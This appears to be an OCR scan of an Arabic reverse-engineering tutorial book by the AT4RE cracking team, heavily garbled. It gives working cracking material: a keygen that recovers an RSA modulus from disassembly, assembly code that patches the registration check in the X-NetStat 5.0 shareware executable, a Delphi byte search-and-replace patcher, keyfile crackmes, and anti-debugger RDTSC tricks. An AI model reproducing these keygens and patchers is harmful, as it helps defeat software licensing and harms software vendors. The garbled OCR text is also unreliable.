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lud log ts aio loss vago: ATARE ly ____—. ) wall. 


A 


206 bo FGInt 9 ya Es 3032 jajaa 
3 


¡00 2 ¿biagaya: FGINtRSA 


a le 
AY 2gogló ¡Da 


A 


E ES 


E , 
e e pá 


SD FGINtG... FGint GOSTDSA Sig 

8 FGIntPri... FGint Primegen Sig 
FGINIRSA, FGint ASA, Signatures 

A FGintE!.. FGint Elgamal Sig 


Micro AM ER Cin mb sem 


List of available library modules 04 xf 


File Op. ( Libramname OOOO 


8 Delphi? Delphi 7 RTL4“CL¿CLX - [TON] 
BECDSA FGint EC DSA Signature 

DD ECElGa... FGint EC Elgamal Sig 

BD ECGFp FGint EC GF(p] Sig 


FGint Signatures 


JD FGINtDSA FGint DSA, Signature 


ja Und y 


ad yk 098 edo lol 2009 
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les logs vado lus aso: ATARE 


ws (bir alo 
Aso 
9 FGINtRSA .pas 


Ho 


aso! 


push 
mov 
add 
push 
xor 


2,0 y FGIntR pas 


-..n EU yo 


mow 
call sub_49F 363 
lea eax, [ebp 
push eax 


Procedure RSA] 


. eos 
1d is 
ebp 
ebp, esp 
esp, OFFFFFFE4h 
ebx 
ebx, ebx 


[ebp+rar_0] , ebx 


[ebp+var_3], ecx 
[ebp+var_4], edx 
eax, [ebp+var_4] 


Sl lied 


System::  linkproc___LStrAddRef(woid *) 
eax, [ebp+var_83] 
System linkproc LStrAddRef (void Y) 


eax, [ebp+var_14] a 
edx, off 49ECD3 
linkp roc 
sax, [ebp+var_1C] 
dx, off 49ECD8 


linkproc__ InitializeRecord(void ?,w 


, Sax 


feet sub_4A64BA 
dioBd ptr fs: [eax] 
f ax], esp 
ebx, ebx 
edad febp+var_14] 
eaxi d ¡Off 4AE6F4 
sub (19-363 
edx, ([ebp+var_1C] 
eax, fis:off 4AE6F3 


sub_49F 368 
eax, [ebp+var_4] 
eax 


ácx, [ebp+var_1C] 
edk, [ebp+var_14] 
ea [ebp+var_4] 


RSAEncCrypt(AnsiString,TFGInt *,TFGInt + 


edx, [ebp+ 
eax, [ebp+var_4] 


InitializeRecord/(void ?,v 


oid ») 


roid Y) 


el Mi 9 al g Lio pus 
** ásglan]l 


»AnsiString $) 


ConvertPase256to64/[2nsiStrinq,AnsiString ¿) 


edx, [ebp+ 

eax, [ebp+var 4] 
Convertó ase2Sótof 4(2msiString, 
esx AÁebptvar_3] 
egf, [ebp 

ystem linkproc 


short loc 4A648C 


LStrCnmp (void) 


eux, ds:of£ 4AEGFA 
sub_49F 368 


edx, [ebp+var_1C] 


eax, ds:off 4AEGF3 


Encrypt (P 


a UI IAS 


no samoma 


dd offset s 175717224553016 ; 


String; Var exp, modb 


dd offset s 65537 ; 


WnsiString £ 


"¿can 
65537 


"17571722455 


3016661212919310537" 


TFGInt; Var E 
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las leg as yz Ives oasz: ATARE ly yd $ ) lwaoeloz 


Posee abr glólas aRSA (+ 
.) 175717224553016661212919810587: us: 3 ga cy Modb:: is il 
Edy ORO Euguadós al gl Butter ¿uo 


O 


dos: 
Loro 6: az) 
265537: 5% gal () Exponent( Ji só Esp o 
¿ud cy al E Hilo dy 


o] 
$ 29-Buffer ¿2 


Pex” mod modb = E 


IO 


job ayas RSA Eyab*a ja 


175717224553016661212919810587+65537'»YAM= JJ! 
Ras a 30 recrouasub_49F368 


Procedure Basel0StringToFGInt (Basel0 
0 Basel0 Gustringigáatos usd za 


zas String= $ Gus-ESTFGInt() 5 


String; Var FGInt 


3FGIntGus zo Buffer Ze 


a FGInt.pas 
TFGInt) 
Procedure ConvertBase256to64 (Const str256 


ES 


String; Var str64 


Str256: EA gar (ld 


FE Q 
String) 
dí: 
o yo AE! .) 10) 
procedure TForml.Gen (Sender 
var 
P E , mySerial: string; 
Medih, Exp : TFGInt; 
begin 
P := 


edName. 1 
Basel0String 


ext; 
q 


ESTO) 


.s 
TObject; var Key: Word; Shift 


oFGInt ('65537' 


A 
2 E70ó(gpon) 
TShiftState); 

Exp); 


ade Bar Ís ul] de odo hs 
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lg los aaa Ives ago: ATARE ly yd E——_—_——— lavados e 


Basel0StringToFGInt ('175717224553016661212919810587', Modb); 
RSAEncrypt(P, Exp, Modb, E); 
ConvertBase256to64(E, mySerial); 
edSerial.Text := mySerial; 
end; 


de ES O 
Sn a q y a pul | 
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escala Patehier EA 


Codine a patciciinas cn 


sa da dsogo) aplica ya, 


lab lus ad loe aso: ATARE 


lali E 


E 


vio loffset 


Offset = RVA -— Virtual Offset + Row Offset 
RVA VA ImageBas 


X-Netstat J229 30206 LordPEsbi llo? jo ja Y ¿3 Sections IE 


[PE Editor ] - c:iprogram filesix-netstat 5.0lxns5.exe 


Basic PE Header Information 


EntryPoint: 00046880 
ImageBase: 00400000 
0 


SizeOflmage: ODOCEEO e 24425519 | 
BaseDfCode: 00001000 47 SizeDíHeaders: 00000400 ?| +| | | Directores 
BaseDíData: 2 Characteristics: et8F|..| UAT 


Sectionálignment: Checksum: 


00000000 | ? | eoTbSE 
z | Compare 
[1] 


Fileálignment: 


Flags 


00001000 00045C08 D0000400 DODA5EDO 60000020 
00047000 00001598 D0046200 00001600 20000040 
00043000 ODO0D0DFD [00047800 D0000000 Co000000 
00084000 DDOD2CEC D0047800 DO002E00 Co000040 
DO04D000 00000010 D0044600 DO0000000 Co000000 
DO04E£000 00000018 D0044600 00000200 50000040 
DO04F000 00008378 D0000000 D0000000 50000040 


DO0BB000 DOOOBE 00 D0044800 DODOBEDO 50000040 


ai Uca lps 2009 


. offset dal O 
FW uaRadAsm. o) 
sel dara galyaiop tios ja pati. O 


9/3 JbuezaPatch. O 

¿Patch2iuajóz O) 
raja cg Patch. ol 
weá ¿Uta O 


lea logs yz loss ago: ATARE Md a JETS de 6 dare z 


A go ud do cil ra ÑO, 


FastS5canner 


% Fille: CAPROGRA“10<-NETS”1.0vxns5.exel 


EntryPoint O EP Section 
Base Of Code 'e) First Bytes 
imageñase O Base 
8) Scan Result 


ye ji asii 


y ari abr del jajaa: 


Hex dung AAA 
See F4 kerne 132. 7C82399F3 
3845_FC 
E 10244500 06 EDXpHN ASCII "Registration successful” 
Bs 3854 =Ó ASCII "Thank you for registerin: 


4000 
ES FF34FCFF x E 
8B45 FS de kerne 132. 70816058 


sa 

Al 8031400 4A818CJ 
y EAXI 

BS 23244508 MOU S ASCII “name” 

BA gol ASCII "Registrat ion” 


5 Al 90 JNZ SHORT 004A2342 


ÉS es, ml 


5 JE SHORT 00442342 


DA Else rai rd A A A A RA LA 


y 
gistrat ion” 


di 


APR E 


al FC 
a B— |MOU ECX, 40 
E a 10249002 [100 EDx, 
[al 8B45 FC MOU EAX 
15]5 E Edi 
12] JE Íns5. 
a anoano MOU ECx, 40 
E f: 10244800 | HOU EOx,nns5- 00492418 


al ly 0d ao lll 2009 


ld logs aa les oagz: ATARE lo rlvcdors e 


Fly JU 35000 Jl joda ia 75 978 ES GE OO0/AL2CIh 


seo ieoffeet aliado ¿e tugto jor e coi e 


VA =  004A22C7h 


RVA = VA - ImageBase = 004A22C7h - 00400000h = A22C7h 

Ofíset = RVA - Virtual Offset + Row Offset = A22C7h - 1000h + 400h = Al16C7h 

pd ds ca OS “e h e Ar A 

O 2) ys Haábíáliz  gedá so in offset o, ¿ac y els ,AL6C7hg DO offset y 
J 


1 


30 ¿63 WinHex 53v5 HexWorkshop 


: HexWorkshop $22 2U0:0672) Edit > Goto... 


Offset = A16C7h 
¿ouacida ¿a Wi JEJE de Emoffset24751374 


Q rd E PÓ RadAsm y 56 abordó ¿opioa : 


:) jabi File > New Project YÍ+ + Cu RadAsmzasó dez 


all ly Uca lll 2009 


log lees dio loss aso: ATARE 


Project Wizard - Type £ Name 
Assembler 


mas 


Project a 


ODIl Project 

O oOcx Project 
OLIB Project 
(ONMAKE Project 


ODos App (.com) 
ODriver (.sys) 
OEmpty make,bat 


O Win32 App (no res) 


ODos App 


Project Name: 
Project Description: 
Projects Folder: 


Md ts 


Patch 4 


¡A 


Patch For X-NetStat 
D:|Creat Patch 


A 


Project Wizard - Template 


(None) 
Daemnonapp, tol 


DialogAsMain.tpl 
DigOpenGL,tpl 
Game, tpl 
OpenGL. tpl 
RichEditEditor,tpl 
ServiceApp.tpl 
TabControl.tpl 
Win32EXE,tpl 
Wizard, tpl 


Dialog application 


< Back 


Project Wizard - Make 

Make Menu 
Compile RC 
Assemble 
Link 
Build 
]Go 
Run 
Run w/debug 
Go All 


Assemble Modules 
Compile IDL 


Compile RC: 
Assemble: 
Link: 

Run: 


Run w/debug: 


Res To Obj: 
Asm Module: 


4,0, $B1RC.EXE fv,1 


3,0, $BAML.EXE [c ¿coff ¿Cp fnologo /1"$1",2 


5/0, SBLINK. EXE ¿SUBSYSTEM: WINDOWS ¡RE 


0,0,5 
D,0,"$ErOllyDbg",5 
rsrc,obj,O, $B1CVTRES.EXE,rstc.res 


* obj,O, $BIML.EXE ¿c fcoff ¡Cp fmologo J1"$1": 


Project Wizard - Files € Folders 
File Creation 
A 


y 


older Creatio! 
Bak DÁ 
Res Sh 


< Back 


CA 


EM Patch For X-NetStat 5.0 


Áns5.exe 


www. atáre.com 


as ows 248 


(Y Patch For<NetStat 
E Y Assembly 

[a] Patch. Asm 
| [£] Patch.Inc 
E (Y Resources 


a ay ll ao lll 


ld lus ad loe gasz: ATARE 


ID List=14 3 ID BackUp=13 3 1D Exit = 
125 


HANDLE CreateFile ( 


LPCTSTR IpFileName 
DWORD dwDesiredAccess 


DWORD dwShareMode 


LPSECURITY_ATTRIBUTES IpSecurityAttributes 


DWORD dwCreationDistribution 


DWORD dwrlagsAndAttributes 


HANDLE hTemplateFile 


GetFileSize ( 
HANDLE hFile 


LPDWOROD IprFileSizeHigh 


CreateFileMapping ( 


HANDLE hFile 


A INS 


Me e tsr 


laredo e 


E poo jas: ¿to AJO ZID y 


ID About = 
113 


ID Pacth = 10 


Lana gs 


32 ¿li 290 
ES AA 
an AS Write 35 Write Read 
0 
CREATE _NEWlJios aál0 5 ala jaja 
CREATE_ALWAYS ¿ió iyad jaolita 0 pagadas, 
cdabál. 900 OPEN_EXISTING 


+A. 
OPEN_ALWAYS 


Loy dl ly 


q daga o A 
008 gta áll ¿by TRUNCATE_EXISTING 
le eL. 


s5/abít: So 391950 5-05 PÓs galo ¿o 
FILE_ATTRIBUTE_NORMAL 
0 


geouetusogor? igábál peana y ió EAN 


200 24 ¿aya Createfile 
0 


ERE OS TA 
losa EAX 
Sy dll 7 ¿a st ¿ya Createfle 


lab lus ad loe gasz: ATARE 


Md ts 


laredo e 


LPSECURITY_ATTRIBUTES IpFileMappingAttributes 


DWORD flProtect 


DWORD dwMaximumsSizeHigh 


DWORD dwMaximumSizeLow 


LPCTSTR IpName 


MapViewoOfFile ( 


HANDLE HFileMappingObject 


DWORD dwDesiredAccess, 
DWORD dwFileOffsetHigh 

DWORD dwrFileOffsetLow 

DWORD dwNumberOfBytesToMap 


HANDLE hFile | 
l 

LPCVOID IpBuffer 

DWORD nNumberO0fBytesToWrite 


LPDWORD IpNumberOfBytesWritten 


LPOVERLAPPED IpOverlapped 


IsDlgButtonChecked ( 


A TIN 


0 
aga dytaaó q, dle ago PAGE READMANTE La” 300 5 
Mito qua ds ÓN 30 aaa ja ¿sos 
0 
CN 


0 


US 
Le bol nl gia de a ia 
e del 

o EN A] 

iia 


ale Sl Lilo? ad cd 


yl pasó y 
SA devo ¿Sua pyasho o 

y Ens q gd j 
sol Uco ¿een a ¿ai a 


0 


Ab MAL? ¿y li yálasdo 
y all al oy Ju a Le AD ¿Udo 7 ya 


MapViewOfFile 


dia lagos 
si pálal za da 200 Jae CreateFile 


13 ¿Sas dif go EAX BackUp Control ] E pe) 


lab lus ad loe gasz: ATARE 


laredo e 
HWND hDlg 


int nlDButton 


Ay 


BackUp Control 3) 322 1D 


AS 


Project 
ala o y 
(3 Patch For <-NetStat 
2-1 Assembly 
[a] Patch. £sm “€K<= 
[£] Patch.Inc 
2-1 Resources 


-ES] Patch.dla 
[F] Patch.Rc 


yl Qo aga Sue Patch : 


A A 
Ed 20 ; CRU Aya Os Meza 59 J9907 GAS | IS 


L- 


puálal pao y Y ablar 


Cel mba aLil: 


ThE 


The File 


4. 


0 d Go Dz € [ue + i 


As 


ya: 


A INS 


loba le 0 o loe ag: ATARE O TS 


FileName 


maping 
hllin 


z backupnC 
BackUpFile 


maping sizer 
hWin BackUpText 


backupnC 


maping 


hlin FilePatched 
maping 
hFile 


hllin FileNotFound 


invoke CreateFile, addr FileName, GENERIC_READ + 
GENERIC_WRITE, FILE_SHARE_WRITE, O, OPEN_EXISTING, 


dei FILE_ATTRIBUTE_NORMAL, O 


ad papas 00 dl UR TÓS y sj vas 
decos) aye domos OPEN_EXISTING geóga5 


dñujye a dl yg dijo ¿id El 
mov [hFile], eax dy all jo cba y al y ll, 
hFile ¿Vig ánó pue Ju gue audzdue ata, 
E IL TN 
1- itayo EAX ¿24d ), CreateFile álál úy > cia 
ZU jasa sn 
AEAX 


jz Exit gol dog ¿als JOE jar Soya), 
¿UN spa 
invoke GetFileSize, [hFile], 0 dbz de dog Maig aq GO y lalo ¿dl e ga 
A AN 
mov [sizeF], eax NUERA ER 
390 Bose au zoe data. 
invoke CreateFileMapping, [hFile], O, PAGE_READWRITE, O, ga cio aladas Sc ¿341349 gara ¿00 


$ ad gn jua $0, y de o 


A EAX 
invoke MapViewOfFile, eax, FILE_MAP_WRITE+ blo EY ¿ab jaca ¿ud ya ya 


FILE_MAP_READ, O, O, O 39 oidaió sed, Sa mb 


ai Uca Ulea 2009 G7 === 


lab lunas ad loe gasz: ATARE 


invoke IsDlgButtonChecked, hWin, 13 
EL GYEAX E al yá y: al ye 30) 


jz backupnC 


invoke CreateFile, addr BackUpFile, GENERIC_READ+ 
GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 


FILE_ATTRIBUTE_NORMAL, O 


mov edi, eax 


invoke WriteFile, eax, [mapingl], [sizeF], addr nBytes, O 


invoke CloseHanadle, edi 
invoke SendDlgltemMessage, hWin, 14, LB_ADDSTRING, O, 


addr BackUpText 
backupncC : 


add eax, OA16C7h 


invoke SendDlgltemMessage, hWin, 14, LB_ADDSTRING, O, 
addr FilePatched 


invoke UnmapViewOfFile, [maping] 
invoke CloseHandle, [hFile] 


ret 


invoke SendDlgltemMessage, hWin, 14, LB_ADDSTRING, O, 
addr FileNotFound 


A TIN 


laredo e 


AU rige 600 yaa %)- Follow in Dump 
O EAX HexWorkshop 
35 WinHex-=> “E eE 
¿UE Jay des ¿lago ¿ll maping Es 


lg 3d ja Jay ge quize data, 


vas BackUp Control 15 óCI ua 


BackUp Control 4%o ¿dí 
Ss 


ce E yu q ld 34 >backupnC 


as rs 
E A 


3 


dl) ¿ió BackUp Control ¿3*k CG gay is 
A IS ES 


sisas o aa CREATE NEW 


AU ábl 3 ód y ¿boció pp! 
lbs y js Cu ge AL aa) ajo 
ayedód bdo dlzo aye CopyFile 
col abál 3400 
A A O 
data 75 Cu e 
US 
Ss ¿hoció FAX pá y dal da goY pj - de 


yan 


» 


jobtáziy o ES de JE ¿aakál soffset=0 
Offset =0A16C7h Úg¿Ó 30 hi 3 


z 


se 


SA 


Cia Fuyed: dd ¿ess say Al ¿La goY 
OllyDhg Ja 9zó da jóó 339 ica jc EAN 
¿boció pilar dotado 47 49 75 da jo 34 ¿ja JE 
¿lar rado 


FlePatched Juas cy cias Go vacas Ll ye judas 
data, rl q 1 
air all 
lbs Jon da 
abs Joe 
silyas ed dabál yy it do 
tg at ¿Ue 39) Exit jz 
de jes aye ra ali; sá daly FileNotFound 
Eg dnd a data, 


o 


SS O TS 


Cd tán o, els ell j0Ó ¿Patch 
dis gu glo ju o .Exit 5 GO 23 Eueds ¿Lido 


ns) án de A yás jua ¿dai 


¿uds ell rayar da 


e db "C:|Program Files! X-NetS 
UpFile db n 
ackUpText do 
FileFound db "The file is Found 
FileNotFound db "The File is Not Found 
FilePatched db "The File Pa ed 


ageiloubt db "( ed By Mouradpr/AT4RE 
iboutTitre db "M ge 


Jj ado, Si, 2d 


wParanm About 
hWVin M gel AboutTitre 
wPararn Exit 


Jm jue Patch da oe: 


82/2/49! (BP) 3 a sa 
AA 


(9 


ai ls Uca lps 2009 ( 173 == 


lab lus ad loe gasz: ATARE 


E 


MM Patch For X-NetStat 5.0 


Arab Team For Reverse Engineering 


Application xns5.exe 


Cracker ATARE 
URL 


: wow, atáre.com 
Release Date : 


ARARIORS 


Information 


[A X-NetStat 5.0 - (15 days left) 


Register X-NetStat IX 
X-NetStat is shareware. lt is free to try for 15 days, 
after which time you must register or uninstall the 
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Caesar(T) =19+7Mod26=0 (A) 
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lab lus ad loe gasz: ATARE JA ud) (El JETS de 6 laredo e 


Caesar(R) =17+7 Mod 26=24 (Y) 
Caesar(E) =4 +7Mod26=11(L) 
Js iyAlyiayesATRE 30 HAYL... 
ale 06 op 
EIN 0 ¿Es abixgól sal jaición ya PAN ¿Oca JOA JA, 


ñ aa 
ole al: 


xXx = Caesar(X) — Key Mod NM 


: HAYL di róso 


39dósto id io: 


InversCeasar(H) =7-7Mod26=0(A) 

InversCeasar(A) =0-7Mod 26=- 7 Mod 26 =45 Mod 26=19(T) 
InversCeasar(Y)  =24-7Mod 26=17(R) 

InversCeasar(L)  =11-7Mod26=4(E) 


45=-7[26] : ve 1Jdlz 


e jigoe god je Caesar pat ¿KeyFileMe dy doc all y yo 0 dd Ajo: 


[my Caesar KeyFileME 


Registered To: UnRegistered 
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lab lus ad loe gasz: ATARE 


mov g 
LE x==1M_INITDIALOG 
a MA 
. if 
mov hFile 
invoke ReadFile,hFile 
invoke lstrlen 
mov Len 
xor ea 


ptr RegBuffer 
OrginalToT 


jnz n Char 
invoke tDligItemT hlin 
invoke CloseHandle 


«2132 
invoke ExitProcess 


.endif 


OrginalTo ole endp 
TableTo0rginal proc 


TableTo0rginal endp 
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RegFile, GENERIC READ, FILE SHARE READ 
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1002 ¿s:+ Unregistered Labl «22*ÓlD< 
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OPEN_EXISTING,FILE ATTRIBUTE NORMAL 


gbBuffer 


TableToOrginal 3 OrginalToTable Sizz 


lbs leg as oz Ives oasz: ATARE lolo dose 
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RegFile AT4RE.bin 


RegBuffer 
Len 


* TableToOrginal 3 OrginalToTable SEGS aci Je E 
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con 
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41h * ABCDh = 2E9FODh 


El $ Ay ¿Qátajo 22s9Fh AS EE 
3Ph * FO6OCOCh + PIh*123450h = 124bRF100 h 
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IFAD3990D00790CD11004F842ERC43C 


¿ya xe Sy pon doy ¿QábajO E IS 30 ¿od 900 el La lso, 330 AU jotas Li 


Us oda en edad ur ¿al ye ¿DO yiros, 
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Suesizude J¿g0l 


A US 


bs ló nd d abydjally 
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Que Ly d 
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debo 32 003% e daayts y y 16 dea 


Més 635 ggó Óso Maó 16 1 32 = 3,4028236692093846346337460743177€+38 
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lab lus ad luego: ATARE a iclvedonz 


Delgpitia Search Ang Keplace ads 


SearchxReplace patch codin< (Delphi) 


lo y 


xl EST E oguesiábaliya goma ES ¿pá ExO der 


abíly ya ¿bh Jay Eayh yu ¿glas $ siya pre dj ¡O ja: “9 au) 
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sarta ls 8 ó, 


ñ ; " 
CIO A PA A 
9 3 rad ya Dd gala id £ JA a CA 


"Y yy ds 


alí $ jus Ja Gaga 


E 


. OllyDbg o) 
. Delphi 7 o) 2 
A (0) f 
va 332 HexWorkshop v5 
Ls SU Ahmad kz0%. o) 


038 


fio OS ei Fado ba 


ds Less ¿oo ak es dd o 


jad 10 Es Ei jue y ¿la ca 
E O A 


ai Uca lps 2009 ss j=— 


labs lus ad loe gasz: ATARE 


function TestHexValue (TargetNumber: string; Resultlbl1: TLabel; ActionEdt: 
ActionBtn: TButton): Boolean; 
var i: longint; 
TmpString: string; 
begin 
Result := False; 
if TargetNumber = '' then Exit; 
TmpString := TargetNumber; 
TargetNumber := ''; 
for i := 1 to Length(ImpString) do 
TargetNumber := TargetNumber + Upcase(ImpString[i]); 
for i := 1 to Length(TargetNumber) do 
if ((TargetNumber[il] < '0') or (TargetNumber[i] > '9')) and 
< 'A') or (TargetNumber[i] > 'F')) 
then 
begin 
ActionEdt.MaxLength := 1; 
ResultLbl.Font.Color := ClRed; 
ResultLbl.Caption := 'BAD'; 
ActionBtn.Enabled := False; 
Result := False; 
Exit; 
end else 
begin 
ActionEdt.MaxLength := 0; 
ResultlLbl.Font.Color := ClGreen; 
ResultLbl.Caption := 'GOOD'; 
ActionBtn.Enabled := True; 
Result := True; 
end; 
end; 
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Caja iz qa Ens AEREA Hexadecimal 


Lor) tg iógálivo gue 
1% gue ¿doit ya gal ¿js dal ¿od 


EN Sa gyaLal ¿all ys A 17] 


ps 


só ato abogó dz era mija, 


laredo e 


ss Jéve EEE e y ¿olaaa laa ¿3 zea As a 
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00000 
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TEdit; 


((TargetNumber [i] 


lwarled e 


E Fons 4. dee IAN s OS 
¿ini ja 97 e 39 Hexadecimal 6405 ¡LES 
¿eS d clas 


ANA EN JU 


if Length(OriginalValueEdt.Text) = Length (PatchedValueEdt. Text) then 
begin 


EqualityReportlbl.Caption := 'GOOD'; 
EqualityReportlbl.Font.Color := ClGreen; 
end else 


begin 
EqualityReportlLbl.Caption := 'BAD'; 
EqualityReportLbl.Font.Color := ClRed; 
end; 


Y buós a Mtra ge Je fondo ¿lija jul a 083) a 


procedure BackupFile(sFileName: string; ReportMmo: TMemo)'; 
begin 
CopyFile (Pchar (sFileName), Pchar (sFileName + '.Bak'), True); 
ReportMmo.Lines.Add('Original file backup... OK'); 
end; 


de jobs? jgor all alle zoe aya ¿Óleo saya «3 ¿el aldo A Loya le E 


Sd or badd tb t cad 


if Pos(sOriginalByte, Str) > O then 
begin 


end 
else 
begin 
Main.ReportMmo.Lines.Add('Already Patched'); 
end;; 
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$e 00 ql 


dí FormatByte vasgás Characters + a ¿que abeja ¿nod Jeasóó ¿oz Hexadecimal 


p 


abr ile, 


function FormatByte (sValue: string): string; 
var i: cardinal; 
sData: Byte; 


begin 
for i := 0 to (length(sValue) div 2) - 1 do 
begin 
sData := StrTolnt('S' + Copy(sValue, (1 * 2 + 1), 2)); 
Result := Result + Char (sData); 
end; 
end; 


Eg Jrdalal al ollcaya ceo 4, $0 FUN $e ésa ale! St 
¿aja Cr Js ¿Ro sel al 6 í a gas yd ” 
159 ¿dao 20 $02, 
function Search(sFileName, sOriginalByte: string): Boolean; 
var 
F: file; 


Str: string; 
Il: Integer; 
begin 


AssignFile(F, sFileName); 
Reset(F, 1); 

I := FileSize(F); 
SetLength(Str, FileSize(F)); 
BlockRead(F, Str[11, 1); 


if Pos(sOriginalByte, Str) > O then 

begin 
Main.ReportMmo.Lines.Add('First byte Offset : 0x' + 

IntToHex (Pos(sOriginalByte, Str) - 1, 8)); 

Main.ReportMmo.Lines.Add(''); 
Result := True; 

end 

else 

begin 
Main.ReportMmo.Lines.Add('Nothing found...'); 
Result := False; 
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end; 


CloseFile(F); 
end; 


Bag? fp all sl “ia bs do ya ó dez JO ¿lo ela io jo ¿iaa 


Serón Be ¿A ábálya 
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procedure Replace (sFileName, sOriginalByte, sPatchedByte: string); 

var 
BytesWritten: LongWord; 
F: file; 
Str: string; 
Ej. Y Integer; 

begin 


AssignFile(F, sFileName); 
Reset(EF, 1); 

TI := FileSize(F); 
SetLength(Str, FileSize(F)); 
BlockRead(F, Str[11, 1); 


if Pos(sO0riginalByte, Str) > O then 
begin 
Seek(F, Pos(sOriginalByte, Str) - 1); 


BackupFile(sFileName, Main.ReportMmo) ; 


for y := 1 to Length (sPatchedByte) do 
begin 
BlockWrite(F, sPatchedByte[yl], SizeO0f (sPatchedByte[y]), BytesWritten); 
if sPatchedBytelyl <> sOriginalBytel[yl then 
begin 
Main.ReportMmo.Lines.Add('Original value : ' + 
IntToHex(Ord(sOriginalByte[yl), 2) + ' Patched value : ' + 
IntToHex (Ord(sPatchedBytel[yl), 2)); 
end; 
end; 
end 
else 
begin 
Main.ReportMmo.Lines.Add('Already Patched'); 
end; 
CloseFile(F); 
end; 
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DWORD PTR SS: [EBP+8] 


DWORD PTR SS: [EBP+8] 


MessageBoxA 


Search and Replace - STRELITZIA | AT4RE (2) 


Target lame : [¡BookiSearch and replaceiSourceiSampleiOriginal_Challenge.exe 
Original Value : [35C05974156A0068506040 


Patched Value : [85C05975156A0068506040 


Original Hexadecimal value : GOOD 
Patched Hexadecimal value: GOOD 
Length equalily : GOOD 
Report : 


(o searcn >) First byte Offset : Ox00001102 n 


A IN a Qs da a s 
maya ES ao Lil E EA ja bc on A aho 1] y) value Originals GEA ja Za GA u 


y Value Patchede ¿Chido 


dd ¿, Report 


a ay ud dado lll 


lbs leg as oz Ives osz: ATARE lodclue dore 


85C05974156A0068506040 


Original value 
85C05975156A0068506040 


Patched value 


Search and Replace - STRELITZI4 | 4T4RE 


Target lame : [BookiSearch and replace'SourcelSampleiOriginal_Challenge.exe fopen” 


Original Value : [35C05974156A0068506040 


Patched Value : [85C005975156A0068506040 


Original Hexadecimal value : GOOD 
Patched Hexadecimal value: GOOD 
Length equalily : GOOD 
Report : 


Original file backup... OK 
“| Original value : 74 Patched value : 75 


> 


Search 


eplace eazictga jes, 


Name : AT4RE 
Serial : 123 
f Y » 
Walidate Ahmad_k Exit 
e A —— 
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ljteid ADISCIJO aldo 


Debugsger Detection usins RDTSC trick 


diia O 
¿op UORDTSC bl! ¿ Reverser ¿hi0 yy iaa pisa, O 


Hist Processor==é gota iso Read Time Stamp Counter 2 ¿20% RDTSC 
Instruction 6353 ¿há 


. 9000 aa ¿plagada RDTSC 
dy tag arturo gp JO ds cg os ao 
sio 


1600 JE ¿a e Wikipedia dy 3. 


UnderstandMe 2x0 CI 


.OllyDbg 


.Delphi7 


a y ao llas 2009 


ld lees aa les oagz: ATARE lares t 


ps. 
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KeygenMe | UnderstandiMe 12) 


Señal [A] 
(revister) ( ctose >) Close 


Serial als ¿1 ó Ja Serial 13d ¿bd jagoció Register 


Hesádas Elli q aja zio o 


2 s E 
9a nu. serial ) 


a a A A E 
saya qu Ñ ¿ola zh ¡bo FHáryado 19 
Trim(NameEdt.Text); 
sSerial := 0; 
sName := NamekEdt. Text; 
if NameEdt.Text <> '' then 


begin 

for i := 0 to Length (sName) do 

begin 
sSerial := sSerial + (Ord(sName[i]) * 5 

end; 

ifa = b then 
SerialTest := IntToHex(sSerial, 2) + IntToStr(sSerial * ) else 
SerialTest := IntToHex(sSerial, 16) + IntToStr(sSerial * d 
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if SerialEdt.Text = SerialTest then 
ShowMessage(' [Sucess] Good reverser :)') else 
ShowMessage (' [Error] Bad reverser :( Try again...'); 


var 
Main: TMain; 
a, b integer; 
implementation 


instructions” Seal! A El sia pla 


elo ELA qa Je ¿oz Le Aya as b ado J yo "az, ces abop* po 33 saya ámó la) 


function GetRDTSC: Longlnt; 


var 
TimerHi: DWord; 
TimerLo: Dword; 
begin 
Sleep(10); 
asm 
dw  310Eh // rdtsc 


m 


mov TimerLo, eax 
mov TimerHi, edx 
end; 
Sleep (500); 
asm 
dw  310Eh // rdtsc 
sub eax, TimerLo 


sbb edx, TimerHi 

mov Timerlo, eax 

mov TimerHi, edx 
end; 


ñ 
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Result := TimerLlo div 500000; 
end; 


by a sasiloaye jUáltuaya ds result 196109 4bal 5 ya ¿or lada 


3sldó dE OnCreate J¿ ¿val 


procedure TMain.FormCreate (Sender: TObject); 
begin 

RDTSC 
end; 


procedure TMain.RegisterBtnClick(Sender: TObject); 


begin 
RDTSC 


end; 


: ¿8 0llyDbg Advenced Plugin “25 RDTSC gt ar Es 


MÍ ForceFlags 


-Ant-RDTSC (Driver-based) 
(7) Enable 


— ivethod 1 —) Method 2 


Protected Application Environment — 


Anti-RDTSC(Driver-based)-_5 62h? Enable ¿éso 


img eé OnClick  "3Ugas Mataró ¿esporas gl, a lso ¿Ss OnCreate 
Leo 30155 Register 
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DWORD PTR SS: CEBP-4] 
DWORD PTR SS: [EBP-8] 
pdas 
CALL 


PTR SS: [EBP-4] 
PTR SS: [EBP-8] 
DWORD PTR SS: [EBP-4] 
DWORD PTR SS: [EBP-8] 
DWORD PTR SS: [EBP-4] 
AE 
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MOV DWORD PTR DS:[456C04],EAX 
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Processor 


Le 
CALL Sleep 


DWORD PTR 
DWORD PTR 
Pee 
CALL 


DWORD PTR SS: CEBP-4] 

DWORD PTR SS: [EBP-8] 
DWORD PTR SS: CEBP-4] 
DWORD PTR 35: [EBP-8 
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DWORD PTR SS: [EBP-CI 


DWORD PTR SS: [EBP-24] 


Understa. 00407E1C 
DWORD PTR SS: [EBP-24] 


DWORD PTR SS: [EBP-C] 


DWORD PTR SS: [EBP-28] 


DWORD PTR SS: [EBP-28] 
DWORD PTR SS: [EBP-14] 


Understa. 00497D0CC 


DWORD _PTR_SS: [EBP-CI 


DWORD PTR SS: [EBP-2C] 


Understa. 00407E1C 
DWORD PTR SS: [EBP-2C] 


DWORD PTR SS: [EBP-CI 


DWORD PTR SS: [EBP-307 


DWORD PTR SS: [EBP-30] 
DWORD PTR SS: [EBP-14] 
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at A ¿ola jor a] yd sóla Lui dde epodó FUEWN ¿ya Open Y 


e 


OllyDbg ¿corto due roTsC Ed alle gan 9 006 ¿biya cad arado) dia 
.Anti-RDTSC 33 a, Advenced Plugin 

dl tapa alaba US entro rs cabra 
.OllyDbg Advenced Plugin 


az laa) 
Name : STRELITZIA 
Serial :3A9B8311592688 


Za y 
Name : STRELITZIA 
Serial : 000000000003A9B85281232 
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cda Advance? O yDig a dl 


Advanced OllyDb< Driver Detection | AODD Trick 
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vjabta O 


Fast Processor==2 regias js sui Read Time Stamp Counter ¿0 RDTSC 


Instruction 3 53 ¿hi 


Ey 'd 3SÓAA ES ¿pu yd eLo qgósue Wikipedia 35% + RDTSC 5000 as ¿0h? 
